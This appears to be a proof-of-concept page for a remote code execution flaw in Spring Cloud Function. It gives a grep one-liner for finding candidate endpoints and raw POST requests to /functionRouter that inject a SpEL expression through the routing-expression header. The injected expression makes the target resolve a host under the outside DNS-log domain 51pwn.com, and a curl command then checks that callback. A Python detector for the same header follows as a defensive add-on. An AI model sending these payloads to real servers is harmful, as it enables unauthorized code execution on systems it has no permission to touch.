Spring-Spel-0Day-Poc – Spring Cloud Function spring.cloud.function.routing-expression SpEL RCE PoC
spring-cloud/spring-cloud-function
Get a list of candidate paths for testing by extracting quoted strings from the Java sources:
find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" ./=>|,:}+)'"'"']{8,})"'|sort -u|sed 's/"//g'
...
functionRouter
uppercase
lowercase
...
poc1
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
poc2
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5
51pwn
check
curl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'
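A defender-side check for the request shown above, as an added example that is not part of the original PoC: it parses raw HTTP requests and flags any that carry the spring.cloud.function.routing-expression header, rating values that contain SpEL type references, constructor calls or bean references as high. The function names, severity labels and sample requests are constructed for illustration.

```python
import re

# Header name taken from the request on this page; HTTP header names are case-insensitive.
ROUTING_HEADER = "spring.cloud.function.routing-expression"
# SpEL constructs that a plain routing value does not need: type references T(...),
# constructor calls (new X(...)) and bean references (@bean).
SPEL_RISKY = re.compile(r"\bT\s*\(|\bnew\s+[\w.]+\s*\(|@\w+")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request_line, [(name, value), ...])."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]  # drop the body
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return lines[0].strip(), headers


def inspect(raw):
    """Return None for a request without the header, else a finding dict."""
    request_line, headers = parse_request(raw)
    for name, value in headers:
        if name == ROUTING_HEADER:
            risky = bool(SPEL_RISKY.search(value))
            return {"request": request_line, "value": value,
                    "severity": "high" if risky else "review"}
    return None


# Constructed sample requests (hosts and bodies are placeholders).
BASE = "POST /functionRouter HTTP/1.1\r\nHost: app.example.invalid\r\n"
SAMPLES = {
    "clean": BASE + "Content-Length: 2\r\n\r\nhi",
    "spel": BASE + "Spring.Cloud.Function.Routing-Expression: "
            'T(java.net.InetAddress).getByName("x.example.invalid")\r\n\r\nhi',
    "named": BASE + "spring.cloud.function.routing-expression: 'uppercase'\r\n\r\nhi",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, inspect(raw))
```

The same match can be applied at a reverse proxy or WAF to drop or log the header before it reaches the application.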